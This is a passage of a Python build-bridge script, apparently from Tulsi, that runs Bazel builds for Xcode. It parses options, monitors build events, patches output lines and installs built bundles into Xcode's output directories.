XCODE_INJECTED_FRAMEWORKS = [
'libXCTestBundleInject.dylib',
'IDEBundleInjection.framework',
'XCTAutomationSupport.framework',
'XCTest.framework',
]
_logger = None
def _PrintUnbuffered(msg):
sys.stdout.write('%s\n' % msg)
sys.stdout.flush()
def _PrintXcodeWarning(msg):
sys.stdout.write(':: warning: %s\n' % msg)
sys.stdout.flush()
def _PrintXcodeError(msg):
sys.stderr.write(':: error: %s\n' % msg)
sys.stderr.flush()
def _Fatal(msg, fatal_frame=None):
"""Print a fatal error pointing to the failure line inside the script."""
if not fatal_frame:
fatal_frame = inspect.currentframe().f_back
filename, line_number, _, _, _ = inspect.getframeinfo(fatal_frame)
_PrintUnbuffered('%s:%d: error: %s' % (os.path.abspath(filename),
line_number, msg))
CLEANUP_BEP_FILE_AT_EXIT = False
# Function to be called atexit to clean up the BEP file if one is present.
# This is especially useful in cases of abnormal termination (such as what
# happens when Xcode is killed).
def _BEPFileExitCleanup(bep_file_path):
if not CLEANUP_BEP_FILE_AT_EXIT:
return
try:
os.remove(bep_file_path)
except OSError as e:
_PrintXcodeWarning('Failed to remove BEP file from %s. Error: %s' %
(bep_file_path, e.strerror))
def _InterruptHandler(signum, frame):
"""Gracefully exit on SIGINT."""
del signum, frame # Unused.
_PrintUnbuffered('Caught interrupt signal. Exiting...')
sys.exit(0)
class Timer(object):
"""Simple profiler."""
def __init__(self, action_name, action_id):
"""Creates a new Timer object.
Args:
action_name: A human-readable action name, shown in the build log.
action_id: A machine-readable action identifier, can be used for metrics.
Returns:
A Timer instance.
Raises:
RuntimeError: if Timer is created without initializing _logger.
"""
if _logger is None:
raise RuntimeError('Attempted to create Timer without a logger.')
self.action_name = action_name
self.action_id = action_id
self._start = None
def Start(self):
self._start = time.time()
return self
def End(self, log_absolute_times=False):
end = time.time()
seconds = end - self._start
if log_absolute_times:
_logger.log_action(self.action_name, self.action_id, seconds,
self._start, end)
else:
_logger.log_action(self.action_name, self.action_id, seconds)
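# Typical Timer usage elsewhere in this script, shown here for reference:
#   timer = Timer('Running Bazel', 'running_bazel').Start()
#   ...  # timed work
#   timer.End()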
# Function to be called atexit to release the file lock on script termination.
def _LockFileExitCleanup(lock_file_handle):
lock_file_handle.close()
def _LockFileAcquire(lock_path):
"""Force script to wait on global file lock to serialize build target actions.
Args:
lock_path: Path to the lock file.
"""
_PrintUnbuffered('Queuing Tulsi build...')
# TODO(b/69414272): See if we can improve this for multiple WORKSPACEs.
lockfile = open(lock_path, 'w')
# Register "fclose(...)" as early as possible, before acquiring lock.
atexit.register(_LockFileExitCleanup, lockfile)
while True:
try:
fcntl.lockf(lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as err:
if err.errno != errno.EAGAIN:
raise
else:
time.sleep(0.1)
class CodesignBundleAttributes(object):
"""Wrapper class for codesigning attributes of a signed bundle."""
# List of codesigning attributes that this script requires.
_ATTRIBUTES = ['Authority', 'Identifier', 'TeamIdentifier']
def __init__(self, codesign_output):
self.attributes = {}
pending_attributes = list(self._ATTRIBUTES)
for line in codesign_output.split('\n'):
if not pending_attributes:
break
for attribute in pending_attributes:
if line.startswith(attribute):
value = line[len(attribute) + 1:]
self.attributes[attribute] = value
pending_attributes.remove(attribute)
break
for attribute in self._ATTRIBUTES:
if attribute not in self.attributes:
_PrintXcodeError(
'Failed to extract %s from %s.\n' % (attribute, codesign_output))
def Get(self, attribute):
"""Returns the value for the given attribute, or None if it wasn't found."""
value = self.attributes.get(attribute)
if attribute not in self._ATTRIBUTES:
_PrintXcodeError(
'Attribute %s not declared to be parsed. ' % attribute +
'Available attributes are %s.\n' % self._ATTRIBUTES)
return value
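# For reference, `codesign -dvv` reports the attributes parsed above as lines
# of the form "Identifier=com.example.App", "TeamIdentifier=ABCDE12345" and
# "Authority=iPhone Developer: ..." (values illustrative); the slice at
# len(attribute) + 1 strips the '=' separator.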
class _OptionsParser(object):
"""Handles parsing script options."""
# List of all supported Xcode configurations.
KNOWN_CONFIGS = ['Debug', 'Release']
def __init__(self, build_settings, sdk_version, platform_name, arch):
self.targets = []
self.build_settings = build_settings
self.common_build_options = [
'--verbose_failures',
'--bes_outerr_buffer_size=0', # Don't buffer Bazel output.
]
self.sdk_version = sdk_version
self.platform_name = platform_name
if self.platform_name.startswith('watch'):
config_platform = 'watchos'
elif self.platform_name.startswith('iphone'):
config_platform = 'ios'
elif self.platform_name.startswith('macos'):
config_platform = 'macos'
elif self.platform_name.startswith('appletv'):
config_platform = 'tvos'
else:
self._WarnUnknownPlatform()
config_platform = 'ios'
self.bazel_build_config = '{}_{}'.format(config_platform, arch)
if self.bazel_build_config not in build_settings.platformConfigFlags:
_PrintXcodeError('Unknown active compilation target of "{}". '
'Please report a Tulsi bug.'
.format(self.bazel_build_config))
sys.exit(1)
self.verbose = 0
self.bazel_bin_path = 'bazel-bin'
self.bazel_executable = None
@staticmethod
def _UsageMessage():
"""Returns a usage message string."""
usage = textwrap.dedent("""\
Usage: %s <target> [<target2> ...] --bazel <bazel_binary_path> [options]
Where options are:
--verbose [-v]
Increments the verbosity of the script by one level. This argument
may be provided multiple times to enable additional output levels.
--bazel_bin_path <path>
Path at which Bazel-generated artifacts may be retrieved.
""" % sys.argv[0])
return usage
def ParseOptions(self, args):
"""Parses arguments, returning (message, exit_code)."""
bazel_executable_index = args.index('--bazel')
self.targets = args[:bazel_executable_index]
if not self.targets or len(args) < bazel_executable_index + 2:
return (self._UsageMessage(), 10)
self.bazel_executable = args[bazel_executable_index + 1]
return self._ParseVariableOptions(args[bazel_executable_index + 2:])
def GetBaseFlagsForTargets(self, config):
is_debug = config == 'Debug'
return self.build_settings.flags_for_target(
self.targets[0],
is_debug,
self.bazel_build_config)
def GetEnabledFeatures(self):
"""Returns a list of enabled Bazel features for the active target."""
return self.build_settings.features_for_target(self.targets[0])
def GetBazelOptions(self, config):
"""Returns the full set of build options for the given config."""
bazel, start_up, build = self.GetBaseFlagsForTargets(config)
all_build = []
all_build.extend(self.common_build_options)
all_build.extend(build)
xcode_version_flag = self._ComputeXcodeVersionFlag()
if xcode_version_flag:
all_build.append('--xcode_version=%s' % xcode_version_flag)
return bazel, start_up, all_build
def _WarnUnknownPlatform(self):
_PrintUnbuffered('Warning: unknown platform "%s" will be treated as '
'iOS' % self.platform_name)
def _ParseVariableOptions(self, args):
"""Parses flag-based args, returning (message, exit_code)."""
verbose_re = re.compile('-(v+)$')
while args:
arg = args[0]
args = args[1:]
if arg == '--bazel_bin_path':
if not args:
return ('Missing required parameter for %s' % arg, 2)
self.bazel_bin_path = args[0]
args = args[1:]
elif arg == '--verbose':
self.verbose += 1
else:
match = verbose_re.match(arg)
if match:
self.verbose += len(match.group(1))
else:
return ('Unknown option "%s"\n%s' % (arg, self._UsageMessage()), 1)
return (None, 0)
@staticmethod
def _GetXcodeBuildVersionString():
"""Returns Xcode build version from the environment as a string."""
return os.environ['XCODE_PRODUCT_BUILD_VERSION']
@staticmethod
def _GetXcodeVersionString():
"""Returns Xcode version info from the environment as a string."""
reported_version = os.environ['XCODE_VERSION_ACTUAL']
match = re.match(r'(\d{2})(\d)(\d)$', reported_version)
if not match:
_PrintUnbuffered('Warning: Failed to extract Xcode version from %s' % (
reported_version))
return None
major_version = int(match.group(1))
minor_version = int(match.group(2))
fix_version = int(match.group(3))
return '%d.%d.%d' % (major_version, minor_version, fix_version)
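  # For reference, XCODE_VERSION_ACTUAL is a four-digit string, so a value such
  # as "0941" would be reported by _GetXcodeVersionString as "9.4.1"
  # (illustrative value).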
@staticmethod
def _ComputeXcodeVersionFlag():
"""Returns a string for the --xcode_version build flag, if any.
The flag should be used if the active Xcode version was not the same one
used during project generation.
Note this a best-attempt only; this may not be accurate as Bazel itself
caches the active DEVELOPER_DIR path and the user may have changed their
installed Xcode version.
"""
xcode_version = _OptionsParser._GetXcodeVersionString()
build_version = _OptionsParser._GetXcodeBuildVersionString()
if not xcode_version or not build_version:
return None
# Of the form Major.Minor.Fix.Build (new Bazel form) or Major.Min.Fix (old).
full_bazel_version = os.environ.get('TULSI_XCODE_VERSION')
if not full_bazel_version: # Unexpected: Tulsi gen didn't set the flag.
return xcode_version
# Newer Bazel versions specify the version as Major.Minor.Fix.Build.
if full_bazel_version.count('.') == 3:
components = full_bazel_version.rsplit('.', 1)
bazel_xcode_version = components[0]
bazel_build_version = components[1]
if (xcode_version != bazel_xcode_version
or build_version != bazel_build_version):
return '{}.{}'.format(xcode_version, build_version)
else:
return None
else: # Old version of Bazel. We need to use form Major.Minor.Fix.
return xcode_version if xcode_version != full_bazel_version else None
class BazelBuildBridge(object):
"""Handles invoking Bazel and unpacking generated binaries."""
BUILD_EVENTS_FILE = 'build_events.json'
def __init__(self, build_settings):
self.build_settings = build_settings
self.verbose = 0
self.build_path = None
self.bazel_bin_path = None
self.codesign_attributes = {}
self.codesigning_folder_path = os.environ['CODESIGNING_FOLDER_PATH']
self.xcode_action = os.environ['ACTION'] # The Xcode build action.
# When invoked as an external build system script, Xcode will set ACTION to
# an empty string.
if not self.xcode_action:
self.xcode_action = 'build'
if int(os.environ['XCODE_VERSION_MAJOR']) < 900:
xcode_build_version = os.environ['XCODE_PRODUCT_BUILD_VERSION']
_PrintXcodeWarning('Tulsi officially supports Xcode 9+. You are using an '
'earlier Xcode, build %s.' % xcode_build_version)
self.tulsi_version = os.environ.get('TULSI_VERSION', 'UNKNOWN')
# TODO(b/69857078): Remove this when wrapped_clang is updated.
self.direct_debug_prefix_map = False
self.normalized_prefix_map = False
self.update_symbol_cache = UpdateSymbolCache()
# Target architecture. Must be defined for correct setting of
# the --cpu flag. Note that Xcode will set multiple values in
# ARCHS when building for a Generic Device.
archs = os.environ.get('ARCHS')
if not archs:
_PrintXcodeError('Tulsi requires env variable ARCHS to be '
'set. Please file a bug against Tulsi.')
sys.exit(1)
self.arch = archs.split()[-1]
# Path into which generated artifacts should be copied.
self.built_products_dir = os.environ['BUILT_PRODUCTS_DIR']
# Path where Xcode expects generated sources to be placed.
self.derived_sources_folder_path = os.environ.get('DERIVED_SOURCES_DIR')
# Full name of the target artifact (e.g., "MyApp.app" or "Test.xctest").
self.full_product_name = os.environ['FULL_PRODUCT_NAME']
# Whether to generate runfiles for this target.
self.gen_runfiles = os.environ.get('GENERATE_RUNFILES')
# Target SDK version.
self.sdk_version = os.environ.get('SDK_VERSION')
# TEST_HOST for unit tests.
self.test_host_binary = os.environ.get('TEST_HOST')
# Whether this target is a test or not.
self.is_test = os.environ.get('WRAPPER_EXTENSION') == 'xctest'
# Target platform.
self.platform_name = os.environ['PLATFORM_NAME']
# Type of the target artifact.
self.product_type = os.environ['PRODUCT_TYPE']
# Path to the parent of the xcodeproj bundle.
self.project_dir = os.environ['PROJECT_DIR']
# Path to the xcodeproj bundle.
self.project_file_path = os.environ['PROJECT_FILE_PATH']
# Path to the directory containing the WORKSPACE file.
self.workspace_root = os.path.abspath(os.environ['TULSI_WR'])
# Set to the name of the generated bundle for bundle-type targets, None for
# single file targets (like static libraries).
self.wrapper_name = os.environ.get('WRAPPER_NAME')
self.wrapper_suffix = os.environ.get('WRAPPER_SUFFIX', '')
# Path where Xcode expects the artifacts to be written to. This is not the
# codesigning_path as device vs simulator builds have different signing
# requirements, so Xcode expects different paths to be signed. This is
# mostly apparent on XCUITests where simulator builds set the codesigning
# path to be the .xctest bundle, but for device builds it is actually the
# UI runner app (since it needs to be codesigned to run on the device.) The
# FULL_PRODUCT_NAME variable is a stable path on where to put the expected
# artifacts. For static libraries (objc_library, swift_library),
# FULL_PRODUCT_NAME corresponds to the .a file name, which coincides with
# the expected location for a single artifact output.
# TODO(b/35811023): Check these paths are still valid.
self.artifact_output_path = os.path.join(
os.environ['TARGET_BUILD_DIR'],
os.environ['FULL_PRODUCT_NAME'])
# Path to where Xcode expects the binary to be placed.
self.binary_path = os.path.join(
os.environ['TARGET_BUILD_DIR'], os.environ['EXECUTABLE_PATH'])
self.is_simulator = self.platform_name.endswith('simulator')
# Check to see if code signing actions should be skipped or not.
if self.is_simulator:
self.codesigning_allowed = False
else:
self.codesigning_allowed = os.environ.get('CODE_SIGNING_ALLOWED') == 'YES'
if self.codesigning_allowed:
platform_prefix = 'iOS'
if self.platform_name.startswith('macos'):
platform_prefix = 'macOS'
entitlements_filename = '%sXCTRunner.entitlements' % platform_prefix
self.runner_entitlements_template = os.path.join(self.project_file_path,
'.tulsi',
'Resources',
entitlements_filename)
self.bazel_executable = None
def Run(self, args):
"""Executes a Bazel build based on the environment and given arguments."""
if self.xcode_action != 'build':
sys.stderr.write('Xcode action is %s, ignoring.' % self.xcode_action)
return 0
parser = _OptionsParser(self.build_settings,
self.sdk_version,
self.platform_name,
self.arch)
timer = Timer('Parsing options', 'parsing_options').Start()
message, exit_code = parser.ParseOptions(args[1:])
timer.End()
if exit_code:
_PrintXcodeError('Option parsing failed: %s' % message)
return exit_code
self.verbose = parser.verbose
self.bazel_bin_path = os.path.abspath(parser.bazel_bin_path)
self.bazel_executable = parser.bazel_executable
self.bazel_exec_root = self.build_settings.bazelExecRoot
# Update feature flags.
features = parser.GetEnabledFeatures()
self.direct_debug_prefix_map = 'DirectDebugPrefixMap' in features
self.normalized_prefix_map = 'DebugPathNormalization' in features
self.build_path = os.path.join(self.bazel_bin_path,
os.environ.get('TULSI_BUILD_PATH', ''))
# Path to the Build Events JSON file uses pid and is removed if the
# build is successful.
filename = '%d_%s' % (os.getpid(), BazelBuildBridge.BUILD_EVENTS_FILE)
self.build_events_file_path = os.path.join(
self.project_file_path,
'.tulsi',
filename)
(command, retval) = self._BuildBazelCommand(parser)
if retval:
return retval
timer = Timer('Running Bazel', 'running_bazel').Start()
exit_code, outputs = self._RunBazelAndPatchOutput(command)
timer.End()
if exit_code:
_Fatal('Bazel build failed with exit code %d. Please check the build '
'log in Report Navigator (⌘9) for more information.'
% exit_code)
return exit_code
post_bazel_timer = Timer('Total Tulsi Post-Bazel time', 'total_post_bazel')
post_bazel_timer.Start()
if not os.path.exists(self.bazel_exec_root):
_Fatal('No Bazel execution root was found at %r. Debugging experience '
'will be compromised. Please report a Tulsi bug.'
% self.bazel_exec_root)
return 404
# This needs to run after `bazel build`, since it depends on the Bazel
# workspace directory
exit_code = self._LinkTulsiWorkspace()
if exit_code:
return exit_code
exit_code, outputs_data = self._ExtractAspectOutputsData(outputs)
if exit_code:
return exit_code
# Generated headers are installed on a thread since we are launching
# a separate process to do so. This gives us clean timings.
install_thread = threading.Thread(
target=self._InstallGeneratedHeaders, args=(outputs,))
install_thread.start()
timer = Timer('Installing artifacts', 'installing_artifacts').Start()
exit_code = self._InstallArtifact(outputs_data)
timer.End()
install_thread.join()
if exit_code:
return exit_code
exit_code, dsym_paths = self._InstallDSYMBundles(
self.built_products_dir, outputs_data)
if exit_code:
return exit_code
if not dsym_paths:
# Clean any bundles from a previous build that can interfere with
# debugging in LLDB.
self._CleanExistingDSYMs()
else:
for path in dsym_paths:
# Starting with Xcode 9.x, a plist based remapping exists for dSYM
# bundles that works with Swift as well as (Obj-)C(++).
#
# This solution also works for Xcode 8.x for (Obj-)C(++) but not
# for Swift.
timer = Timer('Adding remappings as plists to dSYM',
'plist_dsym').Start()
exit_code = self._PlistdSYMPaths(path)
timer.End()
if exit_code:
_PrintXcodeError('Remapping dSYMs process returned %i, please '
'report a Tulsi bug and attach a full Xcode '
'build log.' % exit_code)
return exit_code
# Starting with Xcode 7.3, XCTests inject several supporting frameworks
# into the test host that need to be signed with the same identity as
# the host itself.
if (self.is_test and not self.platform_name.startswith('macos') and
self.codesigning_allowed):
exit_code = self._ResignTestArtifacts()
if exit_code:
return exit_code
# Starting with Xcode 8, .lldbinit files are honored during Xcode debugging
# sessions. This allows use of the target.source-map field to remap the
# debug symbol paths encoded in the binary to the paths expected by Xcode.
#
# This will not work with dSYM bundles, or a direct -fdebug-prefix-map from
# the Bazel-built locations to Xcode-visible sources.
timer = Timer('Updating .lldbinit', 'updating_lldbinit').Start()
clear_source_map = dsym_paths or self.direct_debug_prefix_map
exit_code = self._UpdateLLDBInit(clear_source_map)
timer.End()
if exit_code:
_PrintXcodeWarning('Updating .lldbinit action failed with code %d' %
exit_code)
post_bazel_timer.End(log_absolute_times=True)
return 0
def _BuildBazelCommand(self, options):
"""Builds up a commandline string suitable for running Bazel."""
configuration = os.environ['CONFIGURATION']
# Treat the special testrunner build config as a Debug compile.
test_runner_config_prefix = '__TulsiTestRunner_'
if configuration.startswith(test_runner_config_prefix):
configuration = configuration[len(test_runner_config_prefix):]
elif os.environ.get('TULSI_TEST_RUNNER_ONLY') == 'YES':
_PrintXcodeError('Building test targets with configuration "%s" is not '
'allowed. Please use the "Test" action or "Build for" > '
'"Testing" instead.' % configuration)
return (None, 1)
if configuration not in _OptionsParser.KNOWN_CONFIGS:
_PrintXcodeError('Unknown build configuration "%s"' % configuration)
return (None, 1)
bazel, start_up, build = options.GetBazelOptions(configuration)
bazel_command = [bazel]
bazel_command.extend(start_up)
bazel_command.append('build')
bazel_command.extend(build)
bazel_command.extend([
# The following flags are used by Tulsi to identify itself and read
        # build information from Bazel. They should not affect Bazel analysis
# caching.
'--tool_tag=tulsi_v%s:bazel_build' % self.tulsi_version,
'--build_event_json_file=%s' % self.build_events_file_path,
'--noexperimental_build_event_json_file_path_conversion',
'--aspects', '@tulsi//:tulsi/tulsi_aspects.bzl%tulsi_outputs_aspect'])
if self.is_test and self.gen_runfiles:
bazel_command.append('--output_groups=+tulsi_outputs')
else:
bazel_command.append('--output_groups=tulsi_outputs,default')
bazel_command.extend(options.targets)
extra_options = bazel_options.BazelOptions(os.environ)
bazel_command.extend(extra_options.bazel_feature_flags())
return (bazel_command, 0)
def _RunBazelAndPatchOutput(self, command):
"""Runs subprocess command, patching output as it's received."""
self._PrintVerbose('Running "%s", patching output for workspace root at '
'"%s" with project path at "%s".' %
(' '.join([pipes.quote(x) for x in command]),
self.workspace_root,
self.project_dir))
    # Xcode translates anything that looks like "<path>:<line>:" that is not
# followed by the word "warning" into an error. Bazel warnings and debug
# messages do not fit this scheme and must be patched here.
bazel_warning_line_regex = re.compile(
r'(?:DEBUG|WARNING): ([^:]+:\d+:(?:\d+:)?)\s+(.+)')
def PatchBazelWarningStatements(output_line):
match = bazel_warning_line_regex.match(output_line)
if match:
output_line = '%s warning: %s' % (match.group(1), match.group(2))
return output_line
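    # e.g. an input line of "WARNING: foo/bar.bzl:12: deprecated" (illustrative)
    # becomes "foo/bar.bzl:12: warning: deprecated" so Xcode does not surface it
    # as an error.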
patch_xcode_parsable_line = PatchBazelWarningStatements
if self.workspace_root != self.project_dir:
# Match (likely) filename:line_number: lines.
xcode_parsable_line_regex = re.compile(r'([^/][^:]+):\d+:')
def PatchOutputLine(output_line):
output_line = PatchBazelWarningStatements(output_line)
if xcode_parsable_line_regex.match(output_line):
output_line = '%s/%s' % (self.workspace_root, output_line)
return output_line
patch_xcode_parsable_line = PatchOutputLine
def HandleOutput(output):
for line in output.splitlines():
_logger.log_bazel_message(patch_xcode_parsable_line(line))
def WatcherUpdate(watcher):
"""Processes any new events in the given watcher.
Args:
watcher: a BazelBuildEventsWatcher object.
Returns:
A list of new tulsiout file names seen.
"""
new_events = watcher.check_for_new_events()
new_outputs = []
for build_event in new_events:
if build_event.stderr:
HandleOutput(build_event.stderr)
if build_event.stdout:
HandleOutput(build_event.stdout)
if build_event.files:
outputs = [x for x in build_event.files if x.endswith('.tulsiouts')]
new_outputs.extend(outputs)
return new_outputs
def ReaderThread(file_handle, out_buffer):
out_buffer.append(file_handle.read())
file_handle.close()
# Make sure the BEP JSON file exists and is empty. We do this to prevent
# any sort of race between the watcher, bazel, and the old file contents.
open(self.build_events_file_path, 'w').close()
    # Capture the stderr and stdout from Bazel. We only display it if we're
# unable to read any BEP events.
process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1)
# Register atexit function to clean up BEP file.
atexit.register(_BEPFileExitCleanup, self.build_events_file_path)
global CLEANUP_BEP_FILE_AT_EXIT
CLEANUP_BEP_FILE_AT_EXIT = True
# Start capturing output from Bazel.
reader_buffer = []
reader_thread = threading.Thread(target=ReaderThread,
args=(process.stdout, reader_buffer))
reader_thread.daemon = True
reader_thread.start()
with io.open(self.build_events_file_path, 'r', -1, 'utf-8', 'ignore'
) as bep_file:
watcher = bazel_build_events.BazelBuildEventsWatcher(bep_file,
_PrintXcodeWarning)
output_locations = []
while process.returncode is None:
output_locations.extend(WatcherUpdate(watcher))
time.sleep(0.1)
process.poll()
output_locations.extend(WatcherUpdate(watcher))
# If BEP JSON parsing failed, we should display the raw stdout and
# stderr from Bazel.
reader_thread.join()
if not watcher.has_read_events():
HandleOutput(reader_buffer[0])
if process.returncode == 0 and not output_locations:
CLEANUP_BEP_FILE_AT_EXIT = False
        _PrintXcodeError('Unable to find location of the .tulsiouts file. '
                         'Please report this as a Tulsi bug, including the '
                         'contents of %s.' % self.build_events_file_path)
return 1, output_locations
return process.returncode, output_locations
def _ExtractAspectOutputsData(self, output_files):
"""Converts aspect output from paths to json to a list of dictionaries.
Args:
output_files: A list of strings to files representing Bazel aspect output
in UTF-8 JSON format.
Returns:
return_code, [dict]: A tuple with a return code as its first argument and
for its second argument, a list of dictionaries for
each output_file that could be interpreted as valid
JSON, representing the returned Bazel aspect
information.
return_code, None: If an error occurred while converting the list of
files into JSON.
"""
outputs_data = []
for output_file in output_files:
try:
output_data = json.load(open(output_file))
except (ValueError, IOError) as e:
        _PrintXcodeError('Failed to load output map "%s". '
'%s' % (output_file, e))
return 600, None
outputs_data.append(output_data)
return 0, outputs_data
def _InstallArtifact(self, outputs_data):
"""Installs Bazel-generated artifacts into the Xcode output directory."""
xcode_artifact_path = self.artifact_output_path
if not outputs_data:
_PrintXcodeError('Failed to load top level output file.')
return 600
primary_output_data = outputs_data[0]
if 'artifact' not in primary_output_data:
_PrintXcodeError(
'Failed to find an output artifact for target %s in output map %r' %
(xcode_artifact_path, primary_output_data))
return 601
primary_artifact = primary_output_data['artifact']
artifact_archive_root = primary_output_data.get('archive_root')
bundle_name = primary_output_data.get('bundle_name')
# The PRODUCT_NAME used by the Xcode project is not trustable as it may be
# modified by the user and, more importantly, may have been modified by
# Tulsi to disambiguate multiple targets with the same name.
self.bazel_product_name = bundle_name
# We need to handle IPAs (from {ios, tvos}_application) differently from
# ZIPs (from the other bundled rules) because they output slightly different
# directory structures.
is_ipa = primary_artifact.endswith('.ipa')
is_zip = primary_artifact.endswith('.zip')
if is_ipa or is_zip:
expected_bundle_name = bundle_name + self.wrapper_suffix
# The directory structure within the IPA is then determined based on
# Bazel's package and/or product type.
if is_ipa:
bundle_subpath = os.path.join('Payload', expected_bundle_name)
else:
# If the artifact is a ZIP, assume that the bundle is the top-level
# directory (this is the way in which Skylark rules package artifacts
# that are not standalone IPAs).
bundle_subpath = expected_bundle_name
# Prefer to copy over files from the archive root instead of unzipping the
# ipa/zip in order to help preserve timestamps. Note that the archive root
# is only present for local builds; for remote builds we must extract from
# the zip file.
if self._IsValidArtifactArchiveRoot(artifact_archive_root, bundle_name):
source_location = os.path.join(artifact_archive_root, bundle_subpath)
exit_code = self._RsyncBundle(os.path.basename(primary_artifact),
source_location,
xcode_artifact_path)
else:
exit_code = self._UnpackTarget(primary_artifact,
xcode_artifact_path,
bundle_subpath)
if exit_code:
return exit_code
elif os.path.isfile(primary_artifact):
# Remove the old artifact before copying.
if os.path.isfile(xcode_artifact_path):
try:
os.remove(xcode_artifact_path)
except OSError as e:
          _PrintXcodeError('Failed to remove stale output file "%s". '
'%s' % (xcode_artifact_path, e))
return 600
exit_code = self._CopyFile(os.path.basename(primary_artifact),
primary_artifact,
xcode_artifact_path)
if exit_code:
return exit_code
else:
self._InstallBundle(primary_artifact,
xcode_artifact_path)
# When the rules output a tree artifact, Tulsi will copy the bundle as is
# into the expected Xcode output location. But because they're copied as
# is from the bazel output, they come with bazel's permissions, which are
# read only. Here we set them to write as well, so Xcode can modify the
# bundle too (for example, for codesigning).
chmod_timer = Timer('Modifying permissions of output bundle',
'bundle_chmod').Start()
self._PrintVerbose('Spawning subprocess to add write permissions to '
'copied bundle...')
process = subprocess.Popen(['chmod', '-R', 'uga+w', xcode_artifact_path])
process.wait()
chmod_timer.End()
# No return code check as this is not an essential operation.
self._InstallEmbeddedBundlesIfNecessary(primary_output_data)
return 0
def _IsValidArtifactArchiveRoot(self, archive_root, bundle_name):
"""Returns true if the archive root is valid for use."""
if not archive_root or not os.path.isdir(archive_root):
return False
# The archive root will not be updated for any remote builds, but will be
# valid for local builds. We detect this by using an implementation detail
# of the rules_apple bundler: archives will always be transformed from
# <name>.unprocessed.zip (locally or remotely) to <name>.archive-root.
#
# Thus if the mod time on the archive root is not greater than the mod
    # time on the zip, the archive root is not valid. Remote builds
# will end up copying the <name>.unprocessed.zip but not the
# <name>.archive-root, making this a valid temporary solution.
#
# In the future, it would be better to have this handled by the rules;
# until then this should suffice as a work around to improve build times.
unprocessed_zip = os.path.join(os.path.dirname(archive_root),
'%s.unprocessed.zip' % bundle_name)
if not os.path.isfile(unprocessed_zip):
return False
return os.path.getmtime(archive_root) > os.path.getmtime(unprocessed_zip)
def _InstallEmbeddedBundlesIfNecessary(self, output_data):
"""Install embedded bundles next to the current target's output."""
# In order to find and load symbols for the binary installed on device,
# Instruments needs to "see" it in Spotlight index somewhere on the local
# filesystem. This is only needed for on-device instrumentation.
#
    # Unfortunately, it does not seem to be possible to detect when a build is
# being made for profiling, thus we can't exclude this step for on-device
# non-profiling builds.
if self.is_simulator or ('embedded_bundles' not in output_data):
return
timer = Timer('Installing embedded bundles',
'installing_embedded_bundles').Start()
for bundle_info in output_data['embedded_bundles']:
bundle_name = bundle_info['bundle_name']
bundle_extension = bundle_info['bundle_extension']
full_name = bundle_name + bundle_extension
output_path = os.path.join(self.built_products_dir, full_name)
# TODO(b/68936732): See if copying just the binary (not the whole bundle)
# is enough to make Instruments work.
if self._IsValidArtifactArchiveRoot(bundle_info['archive_root'],
bundle_name):
source_path = os.path.join(bundle_info['archive_root'], full_name)
self._RsyncBundle(full_name, source_path, output_path)
else:
# Try to find the embedded bundle within the installed main bundle.
bundle_path = self._FindEmbeddedBundleInMain(bundle_name,
bundle_extension)
if bundle_path:
self._RsyncBundle(full_name, bundle_path, output_path)
else:
_PrintXcodeWarning('Could not find bundle %s in main bundle. ' %
(bundle_name + bundle_extension) +
'Device-level Instruments debugging will be '
'disabled for this bundle. Please report a '
'Tulsi bug and attach a full Xcode build log.')
timer.End()
# Maps extensions to anticipated subfolders.
_EMBEDDED_BUNDLE_PATHS = {
'.appex': 'PlugIns',
'.framework': 'Frameworks'
}
def _FindEmbeddedBundleInMain(self, bundle_name, bundle_extension):
"""Retrieves the first embedded bundle found within our main bundle."""
main_bundle = os.environ.get('EXECUTABLE_FOLDER_PATH')
if not main_bundle:
return None
main_bundle_path = os.path.join(self.built_products_dir,
main_bundle)
return self._FindEmbeddedBundle(bundle_name,
bundle_extension,
main_bundle_path)
def _FindEmbeddedBundle(self, bundle_name, bundle_extension, bundle_path):
"""Retrieves the first embedded bundle found within this bundle path."""
embedded_subfolder = self._EMBEDDED_BUNDLE_PATHS.get(bundle_extension)
if not embedded_subfolder:
return None
projected_bundle_path = os.path.join(bundle_path,
embedded_subfolder,
bundle_name + bundle_extension)
if os.path.isdir(projected_bundle_path):
return projected_bundle_path
# For frameworks not in the main app bundle, and possibly other executable
# bundle content in the future, we recurse through every .appex in PlugIns
# to find those frameworks.
#
# This won't support frameworks that could potentially have the same name
# but are different between the app and extensions, but we intentionally
# choose not to handle that case. Xcode build system only supports
# uniquely named frameworks, and we shouldn't confuse the dynamic loader
# with frameworks that have the same image names but different content.
appex_root_path = os.path.join(bundle_path, 'PlugIns')
if not os.path.isdir(appex_root_path):
return None
# Find each directory within appex_root_path and attempt to find a bundle.
# If one can't be found, return None.
appex_dirs = os.listdir(appex_root_path)
for appex_dir in appex_dirs:
appex_path = os.path.join(appex_root_path, appex_dir)
path = self._FindEmbeddedBundle(bundle_name,
bundle_extension,
appex_path)
if path:
return path
return None
def _InstallGeneratedHeaders(self, outputs):
"""Invokes install_genfiles.py to install generated Bazel files."""
genfiles_timer = Timer('Installing generated headers',
'installing_generated_headers').Start()
# Resolve the path to the install_genfiles.py script.
# It should be in the same directory as this script.
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'install_genfiles.py')
args = [path, self.bazel_exec_root]
args.extend(outputs)
self._PrintVerbose('Spawning subprocess install_genfiles.py to copy '
'generated files in the background...')
process = subprocess.Popen(args)
process.wait()
genfiles_timer.End()
def _InstallBundle(self, source_path, output_path):
"""Copies the bundle at source_path to output_path."""
if not os.path.isdir(source_path):
return 0, None
if os.path.isdir(output_path):
try:
shutil.rmtree(output_path)
except OSError as e:
        _PrintXcodeError('Failed to remove stale bundle "%s". '
'%s' % (output_path, e))
return 700, None
exit_code = self._CopyBundle(os.path.basename(source_path),
source_path,
output_path)
return exit_code, output_path
def _RsyncBundle(self, source_path, full_source_path, output_path):
"""Rsyncs the given bundle to the given expected output path."""
self._PrintVerbose('Copying %s to %s' % (source_path, output_path))
# rsync behavior changes based on presence of a trailing slash.
if not full_source_path.endswith('/'):
full_source_path += '/'
try:
# Use -c to check differences by checksum, -v for verbose,
# and --delete to delete stale files.
# The rest of the flags are the same as -a but without preserving
# timestamps, which is done intentionally so the timestamp will
# only change when the file is changed.
subprocess.check_output(['rsync',
'-vcrlpgoD',
'--delete',
full_source_path,
output_path],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
_PrintXcodeError('Rsync failed. %s' % e)
return 650
return 0
def _CopyBundle(self, source_path, full_source_path, output_path):
"""Copies the given bundle to the given expected output path."""
